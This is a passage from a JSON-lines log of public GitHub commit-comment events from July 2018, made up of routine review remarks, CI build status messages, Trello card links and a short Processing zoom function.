\n"}},"created_at":"2018-07-31T00:02:41Z"}
{"id":"8040958790","type":"CommitCommentEvent","actor":{"login":"Bahri-Haythem"},"repo":{"name":"Bahri-Haythem/hello-world"},"payload":{"comment":{"id":29895862,"position":2,"line":2,"path":"README.md","commit_id":"0f85b632cd2ac5f51f4e525aab2e86a6ca1c91da","created_at":"2018-07-31T00:03:45Z","updated_at":"2018-07-31T00:03:45Z","author_association":"OWNER","body":"my name is haythem"}},"created_at":"2018-07-31T00:03:45Z"}
{"id":"8040959692","type":"CommitCommentEvent","actor":{"login":"Pomax"},"repo":{"name":"Pomax/processing-bezier-master"},"payload":{"comment":{"id":29895863,"position":null,"line":null,"path":null,"commit_id":"0f8b5c64fa20cd7fefa859ed9f38f8dc48aab68c","created_at":"2018-07-31T00:04:04Z","updated_at":"2018-07-31T00:04:04Z","author_association":"OWNER","body":"Nice! playing around with this a bit, I'll be massaging it a little so that zoom in is on the mouse cursor, but zoom out zooms \"away from\" the mouse cursor (similar to Sketchup etc.)"}},"created_at":"2018-07-31T00:04:04Z"}
{"id":"8040960501","type":"CommitCommentEvent","actor":{"login":"Bahri-Haythem"},"repo":{"name":"Bahri-Haythem/hello-world"},"payload":{"comment":{"id":29895865,"position":null,"line":null,"path":null,"commit_id":"0f85b632cd2ac5f51f4e525aab2e86a6ca1c91da","created_at":"2018-07-31T00:04:21Z","updated_at":"2018-07-31T00:04:21Z","author_association":"OWNER","body":"finish readme"}},"created_at":"2018-07-31T00:04:21Z"}
{"id":"8040963358","type":"CommitCommentEvent","actor":{"login":"keithsw1111"},"repo":{"name":"smeighan/xLights"},"payload":{"comment":{"id":29895870,"position":null,"line":null,"path":null,"commit_id":"c0620268f2b59bb63959f73478091938ad0eee0b","created_at":"2018-07-31T00:05:18Z","updated_at":"2018-07-31T00:05:18Z","author_association":"COLLABORATOR","body":"I believe it is only called when individual start channels is toggled on ... and in that scenario it seems to work well."}},"created_at":"2018-07-31T00:05:18Z"}
{"id":"8040975275","type":"CommitCommentEvent","actor":{"login":"AthenaYT"},"repo":{"name":"AthenaYT/SuperSimpleBot"},"payload":{"comment":{"id":29895912,"position":null,"line":null,"path":null,"commit_id":"df0337d8121abbf364dce024b3e30d918033e4bf","created_at":"2018-07-31T00:09:25Z","updated_at":"2018-07-31T00:09:25Z","author_association":"OWNER","body":"These commits updated via glitch."}},"created_at":"2018-07-31T00:09:25Z"}
{"id":"8040976589","type":"CommitCommentEvent","actor":{"login":"AmpYeen"},"repo":{"name":"AmpYeen/starbound-hyena-race"},"payload":{"comment":{"id":29895914,"position":null,"line":null,"path":null,"commit_id":"ca5786da405c9da2dcfec509b2ed05bb9cad55e5","created_at":"2018-07-31T00:09:53Z","updated_at":"2018-07-31T00:09:53Z","author_association":"OWNER","body":"![](https://github.trello.services/images/mini-trello-icon.png) [universe_server.config.patch](https://trello.com/c/s1kpDg2v/21-universeserverconfigpatch)"}},"created_at":"2018-07-31T00:09:53Z"}
{"id":"8040976961","type":"CommitCommentEvent","actor":{"login":"AmpYeen"},"repo":{"name":"AmpYeen/starbound-hyena-race"},"payload":{"comment":{"id":29895915,"position":null,"line":null,"path":null,"commit_id":"ca5786da405c9da2dcfec509b2ed05bb9cad55e5","created_at":"2018-07-31T00:10:02Z","updated_at":"2018-07-31T00:10:02Z","author_association":"OWNER","body":"![](https://github.trello.services/images/mini-trello-icon.png) [player.config.patch](https://trello.com/c/8Td0mcJz/20-playerconfigpatch)"}},"created_at":"2018-07-31T00:10:02Z"}
{"id":"8040977282","type":"CommitCommentEvent","actor":{"login":"BClark88"},"repo":{"name":"BClark88/rails-puppies-project"},"payload":{"comment":{"id":29895917,"position":null,"line":null,"path":null,"commit_id":"288c1ae001c4a25ff4da6bc747bd596cb9835328","created_at":"2018-07-31T00:10:09Z","updated_at":"2018-07-31T00:10:09Z","author_association":"OWNER","body":"Looks good"}},"created_at":"2018-07-31T00:10:09Z"}
{"id":"8040977481","type":"CommitCommentEvent","actor":{"login":"AmpYeen"},"repo":{"name":"AmpYeen/starbound-hyena-race"},"payload":{"comment":{"id":29895919,"position":null,"line":null,"path":null,"commit_id":"ca5786da405c9da2dcfec509b2ed05bb9cad55e5","created_at":"2018-07-31T00:10:12Z","updated_at":"2018-07-31T00:10:12Z","author_association":"OWNER","body":"![](https://github.trello.services/images/mini-trello-icon.png) [.metadata](https://trello.com/c/GCIRZl7m/19-metadata)"}},"created_at":"2018-07-31T00:10:12Z"}
{"id":"8040977850","type":"CommitCommentEvent","actor":{"login":"AmpYeen"},"repo":{"name":"AmpYeen/starbound-hyena-race"},"payload":{"comment":{"id":29895920,"position":null,"line":null,"path":null,"commit_id":"ca5786da405c9da2dcfec509b2ed05bb9cad55e5","created_at":"2018-07-31T00:10:20Z","updated_at":"2018-07-31T00:10:20Z","author_association":"OWNER","body":"![](https://github.trello.services/images/mini-trello-icon.png) [.metadata](https://trello.com/c/GCIRZl7m/19-metadata)"}},"created_at":"2018-07-31T00:10:20Z"}
{"id":"8040978777","type":"CommitCommentEvent","actor":{"login":"AmpYeen"},"repo":{"name":"AmpYeen/starbound-hyena-race"},"payload":{"comment":{"id":29895921,"position":null,"line":null,"path":null,"commit_id":"ca5786da405c9da2dcfec509b2ed05bb9cad55e5","created_at":"2018-07-31T00:10:39Z","updated_at":"2018-07-31T00:10:39Z","author_association":"OWNER","body":"![](https://github.trello.services/images/mini-trello-icon.png) [Interface](https://trello.com/c/r1ktBQbp/6-interface)"}},"created_at":"2018-07-31T00:10:39Z"}
{"id":"8040979412","type":"CommitCommentEvent","actor":{"login":"namhyung"},"repo":{"name":"namhyung/uftrace"},"payload":{"comment":{"id":29895925,"position":null,"line":null,"path":null,"commit_id":"33cc6be509aef28a53ec5310a8da5a06a63d0ba2","created_at":"2018-07-31T00:10:52Z","updated_at":"2018-07-31T00:10:52Z","author_association":"OWNER","body":"What about using 'a'?  Was it used already?"}},"created_at":"2018-07-31T00:10:52Z"}
{"id":"8040979603","type":"CommitCommentEvent","actor":{"login":"AmpYeen"},"repo":{"name":"AmpYeen/starbound-hyena-race"},"payload":{"comment":{"id":29895926,"position":null,"line":null,"path":null,"commit_id":"ca5786da405c9da2dcfec509b2ed05bb9cad55e5","created_at":"2018-07-31T00:10:55Z","updated_at":"2018-07-31T00:10:55Z","author_association":"OWNER","body":"![](https://github.trello.services/images/mini-trello-icon.png) [Humanoid](https://trello.com/c/tKb13mgB/5-humanoid)"}},"created_at":"2018-07-31T00:10:55Z"}
{"id":"8040980032","type":"CommitCommentEvent","actor":{"login":"AmpYeen"},"repo":{"name":"AmpYeen/starbound-hyena-race"},"payload":{"comment":{"id":29895927,"position":null,"line":null,"path":null,"commit_id":"ca5786da405c9da2dcfec509b2ed05bb9cad55e5","created_at":"2018-07-31T00:11:05Z","updated_at":"2018-07-31T00:11:05Z","author_association":"OWNER","body":"![](https://github.trello.services/images/mini-trello-icon.png) [AI](https://trello.com/c/2o9gBdU1/1-ai)"}},"created_at":"2018-07-31T00:11:05Z"}
{"id":"8040980900","type":"CommitCommentEvent","actor":{"login":"Zaf9670"},"repo":{"name":"prusa3d/Original-Prusa-i3"},"payload":{"comment":{"id":29895928,"position":null,"line":null,"path":null,"commit_id":"ad994c49ac9211c01122046ce410f98257c35ddf","created_at":"2018-07-31T00:11:23Z","updated_at":"2018-07-31T00:11:23Z","author_association":"NONE","body":"@jamesneal Have you performed PID tuning with the fan on? Anytime you change something regarding temperature or cooling levels it's a good idea to PID tune. Octoprint has a nice plugin that allows custom/variable PID tuning as well."}},"created_at":"2018-07-31T00:11:23Z"}
{"id":"8040980943","type":"CommitCommentEvent","actor":{"login":"lzim"},"repo":{"name":"lzim/teampsd"},"payload":{"comment":{"id":29895929,"position":84,"line":207,"path":"model_workgroup/models/cc_v34_2018_06_19_lzedits_2018_07_30f.mdl","commit_id":"c419d63e307d488d87d134f66d771de2252d2484","created_at":"2018-07-31T00:11:24Z","updated_at":"2018-07-31T00:11:24Z","author_association":"OWNER","body":"@TomRust and @holbrooa Is this correct?  @branscombj @dlkibbe  It seems we should we be copying these out of the data UI standardized definitions, right? Any that have the equation \"GET DIRECT CONSTANTS\" we should pull from the workshopped data UI and model parameters definitions"}},"created_at":"2018-07-31T00:11:24Z"}
{"id":"8040982471","type":"CommitCommentEvent","actor":{"login":"twinaphex"},"repo":{"name":"libretro/reicast-emulator"},"payload":{"comment":{"id":29895932,"position":null,"line":null,"path":null,"commit_id":"b7a698654b26efa15ef82b3ea4c2c846fd99bc1b","created_at":"2018-07-31T00:11:53Z","updated_at":"2018-07-31T00:11:53Z","author_association":"MEMBER","body":"Ugh, I give up - now I set 'TextureUpscale' to a value higher than 0 and it starts crashing at startup again."}},"created_at":"2018-07-31T00:11:53Z"}
{"id":"8040983210","type":"CommitCommentEvent","actor":{"login":"JrSousaJ"},"repo":{"name":"JrSousaJ/ccomp"},"payload":{"comment":{"id":29895934,"position":null,"line":null,"path":null,"commit_id":"520fa93254be2586f1ce46c57b41a5592bf8803e","created_at":"2018-07-31T00:12:08Z","updated_at":"2018-07-31T00:12:08Z","author_association":"OWNER","body":"List of pointer exercises\r\n"}},"created_at":"2018-07-31T00:12:08Z"}
{"id":"8040984580","type":"CommitCommentEvent","actor":{"login":"ubcbot"},"repo":{"name":"classytest/PostTestDoNotDelete"},"payload":{"comment":{"id":29895940,"position":null,"line":null,"path":null,"commit_id":"c35a0e5968338a9757813b58368f36ddd64b063e","created_at":"2018-07-31T00:12:35Z","updated_at":"2018-07-31T00:12:35Z","author_association":"NONE","body":"Automated Test Suite Message"}},"created_at":"2018-07-31T00:12:35Z"}
{"id":"8040986284","type":"CommitCommentEvent","actor":{"login":"nrel-bot-2"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":29895946,"position":null,"line":null,"path":null,"commit_id":"494294b728244d0f123ea856a1b7b2a8fb400f2c","created_at":"2018-07-31T00:13:12Z","updated_at":"2018-07-31T00:13:12Z","author_association":"NONE","body":"develop (Myoldmopar) - x86_64-Linux-Ubuntu-14.04-gcc-4.8-IntegrationCoverage-Debug: OK (2331 of 2331 tests passed, 0 test warnings)\n\n\n\n\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-494294b728244d0f123ea856a1b7b2a8fb400f2c-x86_64-Linux-Ubuntu-14.04-gcc-4.8-IntegrationCoverage-Debug.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.png)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-494294b728244d0f123ea856a1b7b2a8fb400f2c-x86_64-Linux-Ubuntu-14.04-gcc-4.8-IntegrationCoverage-Debug.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-100.0%25-green.png)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-494294b728244d0f123ea856a1b7b2a8fb400f2c-x86_64-Linux-Ubuntu-14.04-gcc-4.8-IntegrationCoverage-Debug.html'>![Coverage Badge](http://img.shields.io/badge/coverage%20status-71.2%25-green.png)</a>\n"}},"created_at":"2018-07-31T00:13:12Z"}
{"id":"8040987074","type":"CommitCommentEvent","actor":{"login":"kt97679"},"repo":{"name":"hulu/statsd-aggregator"},"payload":{"comment":{"id":29895951,"position":5,"line":4,"path":"usr/share/statsd-aggregator/statsd-aggregator.conf.sample","commit_id":"7c6eb84e18cfc59dafd08c5295143f4b89ac04d7","created_at":"2018-07-31T00:13:30Z","updated_at":"2018-07-31T00:13:30Z","author_association":"CONTRIBUTOR","body":"Hi @tens91 please let me know more how do you use statsd-aggregator, I want to have netter understanding of your use case. Thanks!"}},"created_at":"2018-07-31T00:13:30Z"}
{"id":"8040987551","type":"CommitCommentEvent","actor":{"login":"AmpYeen"},"repo":{"name":"AmpYeen/starbound-hyena-race"},"payload":{"comment":{"id":29895954,"position":null,"line":null,"path":null,"commit_id":"19a75f0a448d4989e8a98db47ffaa7b184ed5f7a","created_at":"2018-07-31T00:13:39Z","updated_at":"2018-07-31T00:13:39Z","author_association":"OWNER","body":"![](https://github.trello.services/images/mini-trello-icon.png) [Species](https://trello.com/c/bC5gamAx/16-species)"}},"created_at":"2018-07-31T00:13:39Z"}
{"id":"8040988524","type":"CommitCommentEvent","actor":{"login":"ajrhacker"},"repo":{"name":"mamedev/mame"},"payload":{"comment":{"id":29895959,"position":null,"line":null,"path":null,"commit_id":"796abaf7f3200a96499440a4c40bec3440d55209","created_at":"2018-07-31T00:14:00Z","updated_at":"2018-07-31T00:14:00Z","author_association":"CONTRIBUTOR","body":"This breaks the build on account of there being no member functions named tag or mconfig in device_cococart_interface. Perhaps there needs to be a separate finder template for device interfaces."}},"created_at":"2018-07-31T00:14:00Z"}
{"id":"8040988835","type":"CommitCommentEvent","actor":{"login":"AmpYeen"},"repo":{"name":"AmpYeen/starbound-hyena-race"},"payload":{"comment":{"id":29895963,"position":null,"line":null,"path":null,"commit_id":"19a75f0a448d4989e8a98db47ffaa7b184ed5f7a","created_at":"2018-07-31T00:14:07Z","updated_at":"2018-07-31T00:14:07Z","author_association":"OWNER","body":"![](https://github.trello.services/images/mini-trello-icon.png) [Stats](https://trello.com/c/ohaOFXQc/17-stats)"}},"created_at":"2018-07-31T00:14:07Z"}
{"id":"8040989100","type":"CommitCommentEvent","actor":{"login":"AmpYeen"},"repo":{"name":"AmpYeen/starbound-hyena-race"},"payload":{"comment":{"id":29895965,"position":null,"line":null,"path":null,"commit_id":"59a6c7bc280ed1f3e521cc0907268223024bad5c","created_at":"2018-07-31T00:14:13Z","updated_at":"2018-07-31T00:14:13Z","author_association":"OWNER","body":"![](https://github.trello.services/images/mini-trello-icon.png) [Stats](https://trello.com/c/ohaOFXQc/17-stats)"}},"created_at":"2018-07-31T00:14:13Z"}
{"id":"8040990806","type":"CommitCommentEvent","actor":{"login":"phamminhtan01"},"repo":{"name":"iride2020/iRide-Token"},"payload":{"comment":{"id":29895968,"position":null,"line":null,"path":null,"commit_id":"8f810b3700a24de0ee4f945ef84be7b2f1605610","created_at":"2018-07-31T00:14:49Z","updated_at":"2018-07-31T00:14:49Z","author_association":"NONE","body":"GREAT "}},"created_at":"2018-07-31T00:14:49Z"}
{"id":"8040992500","type":"CommitCommentEvent","actor":{"login":"dorkrawk"},"repo":{"name":"mdprescott/sinatra"},"payload":{"comment":{"id":29895976,"position":78,"line":78,"path":"sinatra/models/comment.rb","commit_id":"ba4af0045d0a1ae2033b7dc13df946d166a0b018","created_at":"2018-07-31T00:15:23Z","updated_at":"2018-07-31T00:15:23Z","author_association":"NONE","body":"You could do something like `created_at[0..3]` to get substring stuff."}},"created_at":"2018-07-31T00:15:23Z"}
{"id":"8040995031","type":"CommitCommentEvent","actor":{"login":"Pomax"},"repo":{"name":"Pomax/processing-bezier-master"},"payload":{"comment":{"id":29895981,"position":null,"line":null,"path":null,"commit_id":"0f8b5c64fa20cd7fefa859ed9f38f8dc48aab68c","created_at":"2018-07-31T00:16:19Z","updated_at":"2018-07-31T00:16:19Z","author_association":"OWNER","body":"Ended up changing it a little to:\r\n```\r\nvoid mouseWheel(MouseEvent event) {\r\n  // We want to zoom in at the cursor, but we want to zoom out away\r\n  // from the cursor, similar to how applications like Sketchup\r\n  // handle scroll based zoom.  \r\n  double step = event.getCount() < 0 ? 1 : -1, \r\n    zoom = 1.1, \r\n    zoomFactor = pow(zoom, abs(step)), \r\n    moveFactor = zoomFactor - 1.0, \r\n    // view to canvas  \r\n    zoomCenterX = (step>0 ? mouseX : (width - (width - mouseX))) / SCALE + ROX, \r\n    zoomCenterY = (step>0 ? mouseY : (height - (height - mouseY))) /SCALE + ROY, \r\n    ox = (ROX - zoomCenterX) * (moveFactor / zoomFactor), \r\n    oy = (ROY - zoomCenterY) * (moveFactor / zoomFactor);\r\n\r\n  SCALE *= (step==1)? zoomFactor : 1/zoomFactor;\r\n  ROX += step * ox;\r\n  ROY += step * oy;\r\n\r\n  redraw();\r\n}\r\n```"}},"created_at":"2018-07-31T00:16:19Z"}
{"id":"8040995073","type":"CommitCommentEvent","actor":{"login":"mew-bot"},"repo":{"name":"MyEtherWallet/MyEtherWallet"},"payload":{"comment":{"id":29895982,"position":null,"line":null,"path":null,"commit_id":"032ea134ce951c189beac7b1de8cf0cb5c4f4141","created_at":"2018-07-31T00:16:20Z","updated_at":"2018-07-31T00:16:20Z","author_association":"NONE","body":"Copy of this build can be found at https://www.mewbuilds.com/build/032ea134ce951c189beac7b1de8cf0cb5c4f4141/index.html"}},"created_at":"2018-07-31T00:16:20Z"}
{"id":"8040999504","type":"CommitCommentEvent","actor":{"login":"dorkrawk"},"repo":{"name":"mdprescott/sinatra"},"payload":{"comment":{"id":29895992,"position":82,"line":82,"path":"sinatra/models/post.rb","commit_id":"ba4af0045d0a1ae2033b7dc13df946d166a0b018","created_at":"2018-07-31T00:18:00Z","updated_at":"2018-07-31T00:18:00Z","author_association":"NONE","body":"It looks like you have some very similar date related methods in `Post` and `Comment`. If you wanted to get into some more advanced use of object oriented Ruby, you could experiment with breaking out the common functionality into a module ( check out the \"Mixins\" section here: https://ruby-doc.com/docs/ProgrammingRuby/html/tut_modules.html ) "}},"created_at":"2018-07-31T00:18:00Z"}
{"id":"8041000032","type":"CommitCommentEvent","actor":{"login":"AzGilrock"},"repo":{"name":"smeighan/xLights"},"payload":{"comment":{"id":29895993,"position":null,"line":null,"path":null,"commit_id":"c0620268f2b59bb63959f73478091938ad0eee0b","created_at":"2018-07-31T00:18:11Z","updated_at":"2018-07-31T00:18:11Z","author_association":"COLLABORATOR","body":"I just tried it with one of my PolyLine models.  If I uncheck the box and recheck it starting with a start channel of #36:1 my next field was \"91\" because the first segment has 30 nodes.  Problem is it didn't put the #36 in front of the channel number and it was not the correct absolute number either."}},"created_at":"2018-07-31T00:18:11Z"}
{"id":"8041000295","type":"CommitCommentEvent","actor":{"login":"mocona"},"repo":{"name":"ProjectInTheClass/SaveDonDon"},"payload":{"comment":{"id":29895994,"position":null,"line":null,"path":null,"commit_id":"7cf125390eea3d79c95746601e816db23576c3bc","created_at":"2018-07-31T00:18:16Z","updated_at":"2018-07-31T00:18:16Z","author_association":"NONE","body":"관련이슈 #22 "}},"created_at":"2018-07-31T00:18:16Z"}
{"id":"8041018766","type":"CommitCommentEvent","actor":{"login":"ransom1538"},"repo":{"name":"tobozo/M5Stack-SD-Updater"},"payload":{"comment":{"id":29896055,"position":null,"line":null,"path":null,"commit_id":"589e714094fedef1284da831edd39a5da7d9b4d8","created_at":"2018-07-31T00:24:55Z","updated_at":"2018-07-31T00:24:55Z","author_association":"NONE","body":"Dude. Ok I am cutting you off from stars.  You bash me online. Suck up stars through a straw. "}},"created_at":"2018-07-31T00:24:55Z"}
{"id":"8041018795","type":"CommitCommentEvent","actor":{"login":"rambleraptor"},"repo":{"name":"modular-magician/ansible"},"payload":{"comment":{"id":29896056,"position":null,"line":null,"path":null,"commit_id":"c2d9032d451de596b428f6c1aeac5d7c1081e4f3","created_at":"2018-07-31T00:24:56Z","updated_at":"2018-07-31T00:24:56Z","author_association":"COLLABORATOR","body":"@ndmckinley and I reviewed this whole commit to ensure its accuracy.  LGTUs!"}},"created_at":"2018-07-31T00:24:56Z"}
{"id":"8041019390","type":"CommitCommentEvent","actor":{"login":"yufelipeto"},"repo":{"name":"elementary/code"},"payload":{"comment":{"id":29896057,"position":21,"line":39,"path":"po/extra/pt_BR.po","commit_id":"06bd1c685ad9f2776788e89e814ade61b552017e","created_at":"2018-07-31T00:25:09Z","updated_at":"2018-07-31T00:25:09Z","author_association":"NONE","body":"Need to update the translation. Scratch is now Code with translates to Código"}},"created_at":"2018-07-31T00:25:09Z"}
{"id":"8041020698","type":"CommitCommentEvent","actor":{"login":"lzim"},"repo":{"name":"lzim/teampsd"},"payload":{"comment":{"id":29896058,"position":null,"line":null,"path":null,"commit_id":"ec8cc7a88ee9774e0bc8b38dde010ccf005f6d23","created_at":"2018-07-31T00:25:38Z","updated_at":"2018-07-31T00:25:38Z","author_association":"OWNER","body":"@TomRust Lines 134 & 152 - Can we workshop the \"Little's Law\" description to be a little more user-friendly? "}},"created_at":"2018-07-31T00:25:38Z"}
{"id":"8041022417","type":"CommitCommentEvent","actor":{"login":"TheOneric"},"repo":{"name":"TheOneric/ExPIIIb"},"payload":{"comment":{"id":29896060,"position":14,"line":17,"path":"EPIIIb-FS.tex","commit_id":"5965d1fb3a045748a9999949edacce980358f973","created_at":"2018-07-31T00:26:15Z","updated_at":"2018-07-31T00:26:15Z","author_association":"OWNER","body":"\\mathds{R} ist afaik nur eine Referenz auf \\mathbb{R}\r\n \\mathbb geht für alle Buchstaben.\r\nWenn man die Einheitsmatrix mit dieser 1 darstellen will, dann muss man \\mathbbm oder \\mathds benutzen"}},"created_at":"2018-07-31T00:26:15Z"}
{"id":"8041024699","type":"CommitCommentEvent","actor":{"login":"nrel-bot-2"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":29896066,"position":null,"line":null,"path":null,"commit_id":"9b04538a7f603fa4011f680d598065b79a4cc5aa","created_at":"2018-07-31T00:27:03Z","updated_at":"2018-07-31T00:27:03Z","author_association":"NONE","body":"#6599-HVACAirloopUnitarySystem-does-not-honor-continuous-fan-mode-using-multispeed-heating-coil (rraustad) - x86_64-Linux-Ubuntu-14.04-custom_check: OK (0 of 0 tests passed, 0 test warnings)\n\n\n\n\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-9b04538a7f603fa4011f680d598065b79a4cc5aa-x86_64-Linux-Ubuntu-14.04-custom_check.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.png)</a>  \n"}},"created_at":"2018-07-31T00:27:03Z"}
{"id":"8041028966","type":"CommitCommentEvent","actor":{"login":"LordEphidel"},"repo":{"name":"TheOneric/ExPIIIb"},"payload":{"comment":{"id":29896079,"position":14,"line":17,"path":"EPIIIb-FS.tex","commit_id":"5965d1fb3a045748a9999949edacce980358f973","created_at":"2018-07-31T00:28:32Z","updated_at":"2018-07-31T00:28:32Z","author_association":"COLLABORATOR","body":"Okay, never mind then"}},"created_at":"2018-07-31T00:28:32Z"}
{"id":"8041037978","type":"CommitCommentEvent","actor":{"login":"DeuMic"},"repo":{"name":"DeuMic/hello-world"},"payload":{"comment":{"id":29896109,"position":null,"line":null,"path":null,"commit_id":"560d9a083fc41a127c7f5ed1c36b4c1aae24c91a","created_at":"2018-07-31T00:31:46Z","updated_at":"2018-07-31T00:31:46Z","author_association":"OWNER","body":"OK, this change really doesn´t bring the big change."}},"created_at":"2018-07-31T00:31:46Z"}
{"id":"8041039155","type":"CommitCommentEvent","actor":{"login":"nrel-bot-2"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":29896113,"position":null,"line":null,"path":null,"commit_id":"9b04538a7f603fa4011f680d598065b79a4cc5aa","created_at":"2018-07-31T00:32:11Z","updated_at":"2018-07-31T00:32:11Z","author_association":"NONE","body":"#6599-HVACAirloopUnitarySystem-does-not-honor-continuous-fan-mode-using-multispeed-heating-coil (rraustad) - x86_64-Linux-Ubuntu-14.04-gcc-4.8-IntegrationCoverage-Debug: OK (2331 of 2331 tests passed, 0 test warnings)\n\n\n\n\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-9b04538a7f603fa4011f680d598065b79a4cc5aa-x86_64-Linux-Ubuntu-14.04-gcc-4.8-IntegrationCoverage-Debug.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.png)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-9b04538a7f603fa4011f680d598065b79a4cc5aa-x86_64-Linux-Ubuntu-14.04-gcc-4.8-IntegrationCoverage-Debug.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-100.0%25-green.png)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-9b04538a7f603fa4011f680d598065b79a4cc5aa-x86_64-Linux-Ubuntu-14.04-gcc-4.8-IntegrationCoverage-Debug.html'>![Coverage Badge](http://img.shields.io/badge/coverage%20status-71.2%25-green.png)</a>\n"}},"created_at":"2018-07-31T00:32:11Z"}
{"id":"8041043048","type":"CommitCommentEvent","actor":{"login":"SmartSan"},"repo":{"name":"SmartSan/smartsan.github.io"},"payload":{"comment":{"id":29896122,"position":null,"line":null,"path":null,"commit_id":"51ec2e1c2f6897a386621353fec7a209c1f6107b","created_at":"2018-07-31T00:33:35Z","updated_at":"2018-07-31T00:33:35Z","author_association":"OWNER","body":"Angular code"}},"created_at":"2018-07-31T00:33:35Z"}
{"id":"8041043212","type":"CommitCommentEvent","actor":{"login":"Dabug123"},"repo":{"name":"LiquidRemix/android_packages_apps_LiquidLounge"},"payload":{"comment":{"id":29896123,"position":39,"line":87,"path":"src/com/liquid/liquidlounge/fragments/GesturesSettings.java","commit_id":"a61c90aadef9cd1717ebb6d7a7eb9431ee143b4a","created_at":"2018-07-31T00:33:38Z","updated_at":"2018-07-31T00:33:38Z","author_association":"NONE","body":"error missing ;"}},"created_at":"2018-07-31T00:33:38Z"}
{"id":"8041043702","type":"CommitCommentEvent","actor":{"login":"Talon1024"},"repo":{"name":"Realm667/WolfenDoom"},"payload":{"comment":{"id":29896125,"position":null,"line":null,"path":null,"commit_id":"406aa2b33fa988fbd17bfc8e9815181212c86cf0","created_at":"2018-07-31T00:33:50Z","updated_at":"2018-07-31T00:33:50Z","author_association":"CONTRIBUTOR","body":"I forgot to mention that I also added user_crosshair UDMF properties to the doors to the Paris catacombs, and the bombs on the main bridge.\r\n\r\nHowever, custom crosshairs on the Paris catacomb doors don't seem to work properly for some reason."}},"created_at":"2018-07-31T00:33:50Z"}
{"id":"8041046383","type":"CommitCommentEvent","actor":{"login":"lzim"},"repo":{"name":"lzim/teampsd"},"payload":{"comment":{"id":29896128,"position":39,"line":479,"path":"model_workgroup/models/cc_v34_2018_06_19_lzedits_2018_07_30f.mdl","commit_id":"e55dcc03ab2d880e9f805efad06acc66086d5f49","created_at":"2018-07-31T00:34:49Z","updated_at":"2018-07-31T00:34:49Z","author_association":"OWNER","body":"@TomRust Need to do this consistently. What about \"Return-to-clinic Visit Interval (RVI)?\""}},"created_at":"2018-07-31T00:34:49Z"}
{"id":"8041047622","type":"CommitCommentEvent","actor":{"login":"lzim"},"repo":{"name":"lzim/teampsd"},"payload":{"comment":{"id":29896136,"position":60,"line":516,"path":"model_workgroup/models/cc_v34_2018_06_19_lzedits_2018_07_30f.mdl","commit_id":"e55dcc03ab2d880e9f805efad06acc66086d5f49","created_at":"2018-07-31T00:35:15Z","updated_at":"2018-07-31T00:35:15Z","author_association":"OWNER","body":"@TomRust Make sure to use \"existing patients\" instead of current patients throughout"}},"created_at":"2018-07-31T00:35:15Z"}
{"id":"8041048279","type":"CommitCommentEvent","actor":{"login":"nrel-bot"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":29896138,"position":null,"line":null,"path":null,"commit_id":"377785e6b9a5142ac8b4ad6e33c55862dad1c9c9","created_at":"2018-07-31T00:35:30Z","updated_at":"2018-07-31T00:35:30Z","author_association":"NONE","body":"159344647-Different-heat-transfer-algorithms-from-reverse-constructions (lgu1234) - i386-Windows-7-VisualStudio-14: OK (2953 of 2953 tests passed, 0 test warnings)\n\n\n\n\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-377785e6b9a5142ac8b4ad6e33c55862dad1c9c9-i386-Windows-7-VisualStudio-14.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.png)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-377785e6b9a5142ac8b4ad6e33c55862dad1c9c9-i386-Windows-7-VisualStudio-14.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-100.0%25-green.png)</a> \n"}},"created_at":"2018-07-31T00:35:30Z"}
{"id":"8041048987","type":"CommitCommentEvent","actor":{"login":"lzim"},"repo":{"name":"lzim/teampsd"},"payload":{"comment":{"id":29896139,"position":63,"line":519,"path":"model_workgroup/models/cc_v34_2018_06_19_lzedits_2018_07_30f.mdl","commit_id":"e55dcc03ab2d880e9f805efad06acc66086d5f49","created_at":"2018-07-31T00:35:45Z","updated_at":"2018-07-31T00:35:45Z","author_association":"OWNER","body":"@TomRust \"Return-to-clinic Visit Interval (RVI)\" First use and then (RVI) second use"}},"created_at":"2018-07-31T00:35:45Z"}
{"id":"8041052497","type":"CommitCommentEvent","actor":{"login":"lzim"},"repo":{"name":"lzim/teampsd"},"payload":{"comment":{"id":29896146,"position":20,"line":435,"path":"model_workgroup/models/cc_v34_2018_06_19_lzedits_2018_07_30f.mdl","commit_id":"e55dcc03ab2d880e9f805efad06acc66086d5f49","created_at":"2018-07-31T00:37:03Z","updated_at":"2018-07-31T00:37:03Z","author_association":"OWNER","body":"@TomRust @branscombj @dlkibbe Need to workshops these sensitivity tests to get our \"magnitude of effect\" or \"degree of influence\" language standardized"}},"created_at":"2018-07-31T00:37:03Z"}
{"id":"8041052852","type":"CommitCommentEvent","actor":{"login":"WaxCylinderRevival"},"repo":{"name":"HistoryAtState/frus"},"payload":{"comment":{"id":29896148,"position":null,"line":null,"path":null,"commit_id":"3d9ab9ee197e56f58ea27aa429a35278fa9d7a4a","created_at":"2018-07-31T00:37:11Z","updated_at":"2018-07-31T00:37:11Z","author_association":"MEMBER","body":"Thanks, @joewiz !"}},"created_at":"2018-07-31T00:37:11Z"}
